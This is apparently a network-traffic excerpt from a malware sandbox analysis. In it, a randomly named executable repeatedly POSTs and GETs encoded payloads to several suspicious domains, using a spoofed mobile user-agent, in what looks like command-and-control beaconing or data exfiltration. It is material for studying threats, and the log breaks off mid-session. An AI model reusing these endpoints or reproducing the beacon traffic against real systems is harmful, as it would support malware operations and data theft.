                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=pF5jkKO85i1hO+bVhlIit8JbF1Mp4xsL0SAIphtaY3da2Xc8/Bno6Z1hMm8XTNPigfkCMr5b4CWG94U9RnJZXkvdHfn5UfqWHgqwQE5YEJWQ7jkt1Gv36lZzyAcegp0mYo9nsaTBYhx3Z0Fici/hNPAuufIKRV9U8d+EtXFQMgJN70qN0hUzZBhvgwfKTYbGWjaifwVqw5L3qMj4PagU8szIZTgU


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.8 | 49748 | 84.32.84.32 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:58.430488110 CET | 1804 | OUT | POST /5kax/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.samundri.online
                                                                                      Origin: http://www.samundri.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.samundri.online/5kax/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      32 | 192.168.2.8 | 49749 | 84.32.84.32 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:01.112942934 CET | 513 | OUT | GET /5kax/?UbRxm=kHRDn+Od6RtwHubD3E4pw9JaMFUU2DIijxVB6CtFbwBz/SAX/B3t7cttXyp9BuzPrv9CCpl0ygq2nuEhZlB9cUHvF/n6EPGCDxKUJTRdD4WbzDcOj2b0xy5K4x5io8krBQ==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.samundri.online
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:02.236140966 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 25 Nov 2024 12:58:02 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 9973
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Server: hcdn
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      x-hcdn-request-id: 3e47831e1565ab2b524d8fdd24affd0b-bos-edge3
                                                                                      Expires: Mon, 25 Nov 2024 12:58:01 GMT
                                                                                      Cache-Control: no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      33 | 192.168.2.8 | 49750 | 104.21.24.198 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:07.868045092 CET | 779 | OUT | POST /ipdr/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.supernutra01.online
                                                                                      Origin: http://www.supernutra01.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.supernutra01.online/ipdr/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=XoEsH8VwIXc5Nvz+H1LAROmu93Sx2tTapmJEPSiW3OhmGSvWCd/aJhIrjfyDEPGekXXuNrpYtb8C6ETJmrpaiPulqiFm5rleUZSrMPtsRfSFhSwDuiDaIawJHmns5pH7gWOpGgqOlTCmLyIreiZml5xd0wmr2BSrvs8xyOviCaES8qYGGKnWnZg1MDk8GV3Sq0rBaVs=
                                                                                      Nov 25, 2024 13:58:09.485135078 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                      Date: Mon, 25 Nov 2024 12:58:09 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r4ObcnUJAOa8s27O0FiJSr%2F7UuYbCDd5oz3qEK313LbkViTDO3HDSV9GPBbrvmhV581GJtMKMPrizzLvKm9O1BapjoozCpnyQxNDSu59wLDDcZV9LK3vuMUi7E%2FqarKBs%2B3t0%2BN3sS730Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cefd5da0729e-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=3474&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=779&delivery_rate=0&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome fri
                                                                                      Nov 25, 2024 13:58:09.485163927 CET | 96 | IN
                                                                                      Data Ascii: endly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      34 | 192.168.2.8 | 49751 | 104.21.24.198 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:10.538378000 CET | 799 | OUT | POST /ipdr/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.supernutra01.online
                                                                                      Origin: http://www.supernutra01.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.supernutra01.online/ipdr/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=XoEsH8VwIXc5NOD+FWjAXumt43Sx8NTWpmNEPXCG07JmGwnWBc/aFBIrp/yMJvGFkXqTNqVYtdQC6EjJlcdZwvuwsiFk0LleUZSrMP4BRe6FhDADvAnZC6wKWmns9pH/gWPMGifTlRqmL30rf2Fh+Jxbwwn49SWhiO8PzunTcaEt5cpscovQkZIeMAMKDiq6wX7xEC4Kj0Iu1ivFByJjCObLKbwy
                                                                                      Nov 25, 2024 13:58:11.851217985 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                      Date: Mon, 25 Nov 2024 12:58:11 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QkuO7VXHip6BV78Xn4xq0u0YPAB6PmMjJtS%2F4MzLw5uvUW1Dv9zYaNcVwIL6IppL19itxu%2FR%2BJn7L130jOrC69xPDb7Pl8cgU%2BquTroEbpK1DVK%2FwPoTBmx2zkjVeCrRp7tFTNwfD%2BYtqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cf0dac764282-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome
                                                                                      Nov 25, 2024 13:58:11.851237059 CET | 100 | IN
                                                                                      Data Ascii: friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      35 | 192.168.2.8 | 49752 | 104.21.24.198 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:13.214023113 CET | 1816 | OUT | POST /ipdr/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.supernutra01.online
                                                                                      Origin: http://www.supernutra01.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.supernutra01.online/ipdr/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:14.825155973 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                      Date: Mon, 25 Nov 2024 12:58:14 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53q3ITgZx9F6KrGn9ebME7mudsH0pkzOiZqt8pAkNotLcde7HSFN7D1fh5RG75jrxVCtE%2FKK7ST8JiD2uLj%2B1W2eodLLdenl24%2BLfcYeUnRIW4gminpQM9rfxXt5QAHiWyq0YCcAN73AQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cf1ec9594397-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1712&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1816&delivery_rate=0&cwnd=65&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frien


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      36 | 192.168.2.8 | 49753 | 104.21.24.198 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:15.916404009 CET | 517 | OUT | GET /ipdr/?UbRxm=aqsMELEoVHYTBvrjaGL2RPOv1CWpxeit3T8CA32c3b1KGgngGePyFU4WnP+JT+CjtUjsMbMtl8M87Wzmg5dknNnagRNh5+9+QvGqF8xbYvDN2Ssh6AjGLaQoW3ut45K01w==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.supernutra01.online
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:17.250654936 CET | 820 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 25 Nov 2024 12:58:17 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mf8UE5%2FYopVdTYi8kIkhK46XiO2qCxBHwh19V3OcDihO0Iasg%2FKQ3ZVPeSbjW9AbmZYDI2SoMQ77STc9V653qO9jBXWIXBfAaM9NfHkizgdnmpMTjipsPSd5pQpNCWgoF%2Bsx%2BFRsmZMZGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e81cf2f5be843e0-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=517&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robo


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      37 | 192.168.2.8 | 49754 | 66.29.137.10 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:23.079618931 CET | 758 | OUT | POST /dmly/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.callyur.shop
                                                                                      Origin: http://www.callyur.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.callyur.shop/dmly/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=ezh7478hMhwHz1bu8p5SVkJNXsVKlrj2SCwa1lKy2g/Mwqf3a77HUUI1Rhp+puPwO6R9oDfjVfm9s14Ue1HyQTCYsmHxvL6gOORuZJA6CXaDOtwQNTBieiRSnPmcCqLp51ikP7I4R7OQregdTkqlV3cG16jN+b8s05K8EIwP82/DLTNSYoiJ08PHH3jvnxOryoggfhw=
                                                                                      Nov 25, 2024 13:58:24.433928967 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      keep-alive: timeout=5, max=100
                                                                                      content-type: text/html
                                                                                      transfer-encoding: chunked
                                                                                      content-encoding: gzip
                                                                                      vary: Accept-Encoding
                                                                                      date: Mon, 25 Nov 2024 12:58:24 GMT
                                                                                      server: LiteSpeed
                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                      connection: close


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      38 | 192.168.2.8 | 49755 | 66.29.137.10 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:25.742373943 CET | 778 | OUT | POST /dmly/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.callyur.shop
                                                                                      Origin: http://www.callyur.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.callyur.shop/dmly/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=ezh7478hMhwHyUru+KRSckJOYMVKqLjqSC8a1kOY2VnM+rv3b67HHkI1FxpmnOPFO6UOoBbjVfy9s1IUfGvzRDCaqmHvlr6gOORuZJVVCT2DO9AQMyBlUCRdkPmcGqLt51jBP5seR/+QrfQdTxGmOnds7aiovbVSw5WBIusQilPWOl84CKqP38nsH0LZiGTDoLwQB2mC5ndpVAZDLl4/G73y7rjX
                                                                                      Nov 25, 2024 13:58:27.003834009 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      keep-alive: timeout=5, max=100
                                                                                      content-type: text/html
                                                                                      transfer-encoding: chunked
                                                                                      content-encoding: gzip
                                                                                      vary: Accept-Encoding
                                                                                      date: Mon, 25 Nov 2024 12:58:26 GMT
                                                                                      server: LiteSpeed
                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                      connection: close


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      39 | 192.168.2.8 | 49756 | 66.29.137.10 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:28.411695957 CET | 1795 | OUT | POST /dmly/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.callyur.shop
                                                                                      Origin: http://www.callyur.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.callyur.shop/dmly/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:29.745877981 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      keep-alive: timeout=5, max=100
                                                                                      content-type: text/html
                                                                                      transfer-encoding: chunked
                                                                                      content-encoding: gzip
                                                                                      vary: Accept-Encoding
                                                                                      date: Mon, 25 Nov 2024 12:58:29 GMT
                                                                                      server: LiteSpeed
                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                      connection: close


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      40 | 192.168.2.8 | 49757 | 66.29.137.10 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:31.068146944 CET | 510 | OUT | GET /dmly/?YvA4=xnL8AvI8CJiPEDU&UbRxm=TxJb7MA4bghX/lTZi4FFUnx8X5IvqZr5NBwuw2qLyVi8/oqCfZzrCw4HdVl5+7DfFNR6jxv9e9mG0XYoVmaYbw3qmnHIup/BR6FUCIQOGhPMZ/gsWiB/XFVGgfvbM52XoA== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.callyur.shop
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:32.464726925 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      keep-alive: timeout=5, max=100
                                                                                      content-type: text/html
                                                                                      transfer-encoding: chunked
                                                                                      date: Mon, 25 Nov 2024 12:58:32 GMT
                                                                                      server: LiteSpeed
                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                      connection: close


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      41 | 192.168.2.8 | 49758 | 37.140.192.206 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:38.112246037 CET | 770 | OUT | POST /2qq5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.iner-tech.online
                                                                                      Origin: http://www.iner-tech.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.iner-tech.online/2qq5/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:38.491647959 CET | 770 | OUT | POST /2qq5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.iner-tech.online
                                                                                      Origin: http://www.iner-tech.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.iner-tech.online/2qq5/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      42 | 192.168.2.8 | 49759 | 37.140.192.206 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:40.774378061 CET | 790 | OUT | POST /2qq5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.iner-tech.online
                                                                                      Origin: http://www.iner-tech.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.iner-tech.online/2qq5/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:42.163389921 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:58:41 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Content-Encoding: gzip


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      43 | 192.168.2.8 | 49760 | 37.140.192.206 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:43.448046923 CET | 1807 | OUT | POST /2qq5/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.iner-tech.online
                                                                                      Origin: http://www.iner-tech.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.iner-tech.online/2qq5/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:44.833441973 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:58:44 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Content-Encoding: gzip


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      44  192.168.2.8  49761  37.140.192.206  80  6380  C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
